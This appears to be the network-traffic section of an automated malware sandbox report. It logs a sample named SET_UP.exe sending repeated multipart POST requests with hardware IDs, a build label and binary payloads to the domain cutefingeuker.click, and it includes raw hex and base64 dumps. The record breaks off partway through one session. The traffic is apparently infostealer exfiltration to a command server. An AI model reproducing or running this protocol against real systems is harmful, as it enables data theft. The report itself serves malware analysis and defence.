                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 54 30 4d 74 39 70 50 32 46 64 66 77 6f 35 31 32 75 47 43 6b 54 35 71 7a 59 63 35 76 6c 2f 2b 45 4b 4b 36 76 30 37 56 6d 65 49 41 48 43 33 2f 2b 68 72 56 44 6d 64 57 6c 68 6e 32 79 49 70 78 4a 6b 4c 5a 74 32 79 4b 4d 6f 35 64 6f 6f 61 61 53 35 79 77 31 7a 30 38 4b 64 62 48 54 39 6e 79 41 30 65 4b 38 64 72 77 73 6c 6c 72 55 6f 69 6a 42 62 34 2b 39 33 54 44 70 72 70 76 6f 49 33 71 41 42 51 4e 6f 2b 34 65 2b 51 35 54 49 72 34 31 31 76 69 71 62 51 5a 71 35 62 74 45 6b 67 37 65 64 61 61 50 6a 33 61 30 68 62 63 46 58 54 56 6e 32 68 37 74 43 31 65 2b 6a 68 33 75 31 4e 4e 46 54 32 71 51 6d 33 79 50 49 36 64 31 6b 6f 4b 4f 59 35 79 4a 31 68 67 49 49 62 76 61 49 75 30 71 64 31 4b 65 4e 65 62 73 76 6c 30 79 54 75 57 50 4b 4b 6f 47 39 6b 53 6a 6e 34 35 54 31 5a 69 33
                                                                                                                                                                                                Data Ascii: T0Mt9pP2Fdfwo512uGCkT5qzYc5vl/+EKK6v07VmeIAHC3/+hrVDmdWlhn2yIpxJkLZt2yKMo5dooaaS5yw1z08KdbHT9nyA0eK8drwsllrUoijBb4+93TDprpvoI3qABQNo+4e+Q5TIr411viqbQZq5btEkg7edaaPj3a0hbcFXTVn2h7tC1e+jh3u1NNFT2qQm3yPI6d1koKOY5yJ1hgIIbvaIu0qd1KeNebsvl0yTuWPKKoG9kSjn45T1Zi3
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 62 48 54 39 6b 53 65 79 4b 36 48 66 4c 38 6b 6d 55 75 61 73 47 33 65 4a 49 2b 32 6d 32 57 68 72 70 62 75 4a 33 47 4c 48 51 35 6d 2b 34 61 38 44 64 6d 61 70 35 45 31 36 6d 4b 32 51 4c 32 74 66 63 6f 35 79 4b 37 54 63 65 6d 6b 6e 36 31 2b 4e 59 49 41 42 47 4c 35 67 37 6c 43 6b 39 53 6d 6a 33 69 33 4c 5a 74 65 6e 4c 4e 72 30 79 43 44 6f 35 31 6c 72 61 2b 58 35 53 31 2f 77 55 46 4e 61 75 6e 4c 37 67 32 69 31 36 2b 4a 64 71 52 69 6a 67 4b 4e 2f 57 48 55 62 39 44 78 6b 57 61 70 72 4a 2f 68 4c 58 32 41 41 77 4e 71 39 49 4b 2b 52 59 58 62 70 49 46 30 76 43 32 51 53 4a 47 34 59 74 38 72 6a 72 37 64 4a 75 6d 6b 69 36 31 2b 4e 61 34 6f 4f 43 2f 51 73 66 5a 53 32 63 50 67 6a 6e 6e 79 65 74 46 41 6c 37 46 75 31 79 6d 42 76 5a 64 68 6f 71 2b 59 36 53 70 38 68 41 6b 4d
                                                                                                                                                                                                Data Ascii: bHT9kSeyK6HfL8kmUuasG3eJI+2m2WhrpbuJ3GLHQ5m+4a8Ddmap5E16mK2QL2tfco5yK7Tcemkn61+NYIABGL5g7lCk9Smj3i3LZtenLNr0yCDo51lra+X5S1/wUFNaunL7g2i16+JdqRijgKN/WHUb9DxkWaprJ/hLX2AAwNq9IK+RYXbpIF0vC2QSJG4Yt8rjr7dJumki61+Na4oOC/QsfZS2cPgjnnyetFAl7Fu1ymBvZdhoq+Y6Sp8hAkM
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 52 4b 6e 73 69 75 68 48 71 36 4b 70 68 4e 6b 4c 68 72 33 69 4f 43 73 4a 70 6d 70 36 76 54 6f 32 5a 79 6d 55 39 56 4c 64 43 62 72 56 2b 42 31 34 47 45 65 76 49 39 33 31 58 55 75 6d 71 59 64 38 69 34 6a 32 79 6b 73 5a 72 71 4b 48 71 43 48 51 78 67 2b 70 6d 78 51 70 50 64 72 49 39 36 74 43 4f 55 52 70 69 36 59 39 4d 67 68 50 48 54 4b 4b 36 37 30 37 56 6d 57 34 6f 63 47 6d 37 2f 67 4b 42 57 31 38 58 75 6b 44 57 31 4c 74 45 55 31 4c 35 74 30 79 75 49 76 5a 31 73 70 4b 4f 42 34 69 46 79 69 41 51 66 5a 2f 61 4d 76 55 57 63 31 61 61 62 65 62 77 77 6c 46 36 47 2f 53 69 59 4b 4a 44 78 78 53 69 66 70 49 50 39 4a 54 65 77 47 51 35 37 2b 6f 61 36 44 59 69 55 75 63 6c 79 76 6d 4c 4a 44 4a 4b 79 62 39 73 67 69 62 69 52 5a 61 79 71 6c 75 77 67 63 59 73 46 44 57 76 33 69
                                                                                                                                                                                                Data Ascii: RKnsiuhHq6KphNkLhr3iOCsJpmp6vTo2ZymU9VLdCbrV+B14GEevI931XUumqYd8i4j2yksZrqKHqCHQxg+pmxQpPdrI96tCOURpi6Y9MghPHTKK6707VmW4ocGm7/gKBW18XukDW1LtEU1L5t0yuIvZ1spKOB4iFyiAQfZ/aMvUWc1aabebwwlF6G/SiYKJDxxSifpIP9JTewGQ57+oa6DYiUuclyvmLJDJKyb9sgibiRZayqluwgcYsFDWv3i
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 61 70 34 55 31 36 6d 4b 53 53 35 65 38 62 4e 45 6a 68 37 61 5a 65 71 4f 6b 67 65 77 6e 66 6f 77 44 44 57 44 38 67 62 64 45 6d 74 61 74 6a 6e 4b 39 4a 39 45 43 31 4c 70 2b 6d 48 66 49 6b 4a 42 6a 70 66 6a 4a 72 54 6b 37 6d 45 38 4b 59 62 48 54 39 6b 32 64 33 36 71 45 64 72 30 68 67 30 32 53 72 32 62 56 4a 5a 71 37 6c 6d 32 6b 72 70 37 75 49 48 4f 4b 41 78 39 6b 38 59 69 39 44 64 6d 61 70 35 45 31 36 6d 4b 79 57 34 4b 33 59 64 51 35 67 37 43 65 66 71 53 7a 30 36 4e 6d 5a 49 59 65 54 54 58 6e 6d 36 46 4b 69 4a 53 35 79 58 4b 2b 59 73 6b 4d 6b 72 52 67 33 79 6d 47 6f 35 68 75 70 71 79 61 35 43 4a 39 67 67 38 4a 61 66 61 4f 74 55 47 63 33 61 4f 47 63 62 73 73 6d 45 50 55 38 79 62 66 4e 38 6a 70 33 55 6d 79 6f 4a 2f 67 5a 6d 72 50 46 6b 31 71 2f 63 76 75 44 5a
                                                                                                                                                                                                Data Ascii: ap4U16mKSS5e8bNEjh7aZeqOkgewnfowDDWD8gbdEmtatjnK9J9EC1Lp+mHfIkJBjpfjJrTk7mE8KYbHT9k2d36qEdr0hg02Sr2bVJZq7lm2krp7uIHOKAx9k8Yi9Ddmap5E16mKyW4K3YdQ5g7CefqSz06NmZIYeTTXnm6FKiJS5yXK+YskMkrRg3ymGo5hupqya5CJ9gg8JafaOtUGc3aOGcbssmEPU8ybfN8jp3UmyoJ/gZmrPFk1q/cvuDZ
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 66 71 51 6e 6c 6c 72 57 69 47 58 57 49 59 2b 6e 33 58 65 57 37 64 50 73 5a 69 32 34 46 6b 31 37 73 64 50 6b 41 39 66 49 34 4e 45 31 39 53 47 44 58 70 4b 2b 63 4e 74 6f 74 6f 2b 36 66 71 4f 6b 67 2b 6f 78 65 73 46 42 54 57 4b 78 30 34 38 4e 6e 74 32 37 6d 47 4f 2f 4d 70 59 4d 71 2f 4d 6d 77 47 2f 51 38 61 68 72 70 36 32 55 2b 7a 63 34 70 68 6b 48 61 75 47 4d 6f 55 4c 58 6c 4f 43 50 4e 65 70 78 33 77 79 51 72 43 61 41 66 39 72 71 79 44 76 2b 38 38 48 79 61 47 7a 42 47 55 30 31 6f 38 58 32 58 39 65 43 34 4d 35 32 6f 44 43 58 54 34 4b 2b 49 65 59 52 72 36 75 51 62 72 36 79 72 64 4d 68 62 34 77 4a 47 6e 79 39 6e 72 56 44 6d 64 32 32 79 54 76 79 4c 64 45 55 72 66 30 75 6d 42 44 47 38 59 55 6f 38 65 4f 6d 37 69 68 37 68 68 6b 63 49 4e 61 52 75 30 75 41 79 2b 44
                                                                                                                                                                                                Data Ascii: fqQnllrWiGXWIY+n3XeW7dPsZi24Fk17sdPkA9fI4NE19SGDXpK+cNtoto+6fqOkg+oxesFBTWKx048Nnt27mGO/MpYMq/MmwG/Q8ahrp62U+zc4phkHauGMoULXlOCPNepx3wyQrCaAf9rqyDv+88HyaGzBGU01o8X2X9eC4M52oDCXT4K+IeYRr6uQbr6yrdMhb4wJGny9nrVDmd22yTvyLdEUrf0umBDG8YUo8eOm7ih7hhkcINaRu0uAy+D
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 5a 4a 65 68 72 74 6c 7a 69 7a 50 6a 36 4e 50 70 36 53 53 2b 7a 5a 69 6a 6a 45 7a 65 50 4b 46 75 45 71 42 79 2b 44 48 4e 62 31 69 79 58 58 55 39 53 62 6e 59 63 69 70 33 54 44 70 6c 70 44 6a 4b 48 4b 58 48 6b 42 4b 2f 34 79 33 57 34 66 4e 72 38 6b 37 38 69 54 52 46 4d 62 7a 4a 74 77 2b 79 4f 6e 4e 4f 76 4c 32 77 4c 70 32 4a 35 35 42 46 43 33 6e 79 2b 34 66 32 5a 71 79 79 53 33 79 5a 5a 4a 65 68 72 74 6c 7a 69 7a 50 6a 36 4e 50 70 36 53 53 2b 7a 5a 69 6a 6b 41 6a 57 39 43 31 69 46 69 55 31 4b 36 4f 59 36 4e 69 33 77 79 62 2f 54 37 68 62 38 44 78 6f 69 62 70 75 39 4f 31 5a 6b 43 43 41 51 4e 71 35 35 72 37 61 70 6e 64 6f 5a 39 6c 70 53 33 65 59 71 4b 63 4a 70 5a 76 6a 76 48 46 4f 75 66 6a 6c 2f 78 6d 4c 64 46 64 56 6a 69 69 33 4f 59 66 69 4a 53 35 79 57 50 79
                                                                                                                                                                                                Data Ascii: ZJehrtlzizPj6NPp6SS+zZijjEzePKFuEqBy+DHNb1iyXXU9SbnYcip3TDplpDjKHKXHkBK/4y3W4fNr8k78iTRFMbzJtw+yOnNOvL2wLp2J55BFC3ny+4f2ZqyyS3yZZJehrtlzizPj6NPp6SS+zZijkAjW9C1iFiU1K6OY6Ni3wyb/T7hb8Dxoibpu9O1ZkCCAQNq55r7apndoZ9lpS3eYqKcJpZvjvHFOufjl/xmLdFdVjii3OYfiJS5yWPy
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 61 36 64 74 74 76 78 76 47 52 4b 50 48 6a 6e 76 38 68 5a 59 4a 44 43 6e 66 32 79 36 6b 44 6a 70 71 32 79 53 33 68 62 4e 46 65 31 4f 55 6d 6e 79 47 46 73 4a 35 6d 71 72 47 42 36 79 56 6a 67 6b 67 7a 55 39 79 5a 73 56 32 55 6d 4a 47 45 63 61 51 33 6b 6c 79 54 67 31 6a 31 50 59 2b 68 6e 69 71 46 70 4a 37 68 47 45 75 32 48 67 70 39 73 36 32 31 57 35 53 61 37 73 6c 74 38 6e 72 52 59 59 61 36 64 74 74 74 70 4c 61 51 5a 4f 6d 38 33 66 52 6d 59 38 46 58 58 69 4f 78 6d 66 59 56 31 35 32 6a 6d 32 65 30 49 59 64 50 30 34 4e 59 39 54 32 50 6f 5a 34 71 6d 4b 36 58 2b 7a 4e 32 6b 51 67 7a 55 39 79 5a 73 56 32 55 6d 49 57 7a 4e 34 4d 30 6b 6b 79 61 75 69 61 57 62 35 44 78 78 53 69 45 73 5a 54 39 4a 54 65 6b 4e 55 39 63 35 34 69 32 51 35 43 61 37 73 6c 35 38 6e 72 52 51
                                                                                                                                                                                                Data Ascii: a6dttvxvGRKPHjnv8hZYJDCnf2y6kDjpq2yS3hbNFe1OUmnyGFsJ5mqrGB6yVjgkgzU9yZsV2UmJGEcaQ3klyTg1j1PY+hniqFpJ7hGEu2Hgp9s621W5Sa7slt8nrRYYa6dtttpLaQZOm83fRmY8FXXiOxmfYV152jm2e0IYdP04NY9T2PoZ4qmK6X+zN2kQgzU9yZsV2UmIWzN4M0kkyauiaWb5DxxSiEsZT9JTekNU9c54i2Q5Ca7sl58nrRQ


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.449751188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:21 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=W6VF34HWOYV
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 18122
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:21 UTC15331OUTData Raw: 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 57 36 56 46 33 34 48 57 4f 59 56 0d 0a 43 6f 6e
                                                                                                                                                                                                Data Ascii: --W6VF34HWOYVContent-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--W6VF34HWOYVContent-Disposition: form-data; name="pid"2--W6VF34HWOYVContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--W6VF34HWOYVCon
                                                                                                                                                                                                2025-01-05 17:02:21 UTC2791OUTData Raw: 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7
                                                                                                                                                                                                Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                                                                                                                                2025-01-05 17:02:22 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:22 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=6e2bdsdkllskqabknomr7i9qln; expires=Thu, 01 May 2025 10:49:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnv%2BhU1n1qoEuVtiN%2BfopvQ7w%2BWhEIXlIdJ65zge%2Ft0pTq8LwpRL8rv000nWA%2Bnmh5qp7wiJJq4cSXmZRyFcgwvsaX%2FP7BcH6KUc1NXbvFg2ZJhrkrDYaGN7C%2ByriYwRbaNbPAfX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd50918e86fc35d-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1510&rtt_var=573&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2850&recv_bytes=19080&delivery_rate=1896103&cwnd=183&unsent_bytes=0&cid=580ee94ef6e868bd&ts=662&x=0"
                                                                                                                                                                                                2025-01-05 17:02:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.449752188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:22 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=KOSWQ2L6
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8725
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:22 UTC8725OUTData Raw: 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 4b 4f 53 57 51 32 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                                                                                Data Ascii: --KOSWQ2L6Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--KOSWQ2L6Content-Disposition: form-data; name="pid"2--KOSWQ2L6Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--KOSWQ2L6Content-Disposi
                                                                                                                                                                                                2025-01-05 17:02:24 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:24 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=2jdv5hrjqhk7fjb2cs7rkif46m; expires=Thu, 01 May 2025 10:49:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwGaBxDJj4yD5I8IRhVqRzHdC9PwKH%2Fd%2B%2Fr5uKRFC2BTOltf%2Bftq0RGw1Vzp%2F8GI0MEOsh35HxWuH1gcuBReV8tU8CBjQX9pG4Q%2FCSTBqcaaWyBGsZY36NmjFhwNMo%2FVEw8HAEN%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd5092048df729e-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1965&rtt_var=752&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2850&recv_bytes=9657&delivery_rate=1441975&cwnd=165&unsent_bytes=0&cid=6c00ee2c02829a46&ts=1519&x=0"
                                                                                                                                                                                                2025-01-05 17:02:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.449753188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:24 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=ENMNWZ6IBCXER1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 20414
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:24 UTC15331OUTData Raw: 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36 49 42 43 58 45 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 45 4e 4d 4e 57 5a 36
                                                                                                                                                                                                Data Ascii: --ENMNWZ6IBCXER1Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--ENMNWZ6IBCXER1Content-Disposition: form-data; name="pid"3--ENMNWZ6IBCXER1Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--ENMNWZ6
                                                                                                                                                                                                2025-01-05 17:02:24 UTC5083OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                2025-01-05 17:02:25 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:25 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=5ts4l3jfe8dnl32aduteg89nn1; expires=Thu, 01 May 2025 10:49:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRiDKOQ7SlDWlEFEl%2BFoDaGZpp5Bdd4Hb5ONpvPAU%2F6CkqJjTwVYqLHsD%2BYukalSiqRUYJcJVYglhGGOZsjT93s0zot8CToOYNynQFy4nhw7eeH6G7230tiE%2FOJRurcaWNANczDp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd5092def70430a-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1601&rtt_var=619&sent=10&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21375&delivery_rate=1743283&cwnd=225&unsent_bytes=0&cid=9f5ce4bb3a96873f&ts=639&x=0"
                                                                                                                                                                                                2025-01-05 17:02:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.449754188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:26 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=OWVLA8FA5OYYV1IS08
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 969
                                                                                                                                                                                                Host: cutefingeuker.click
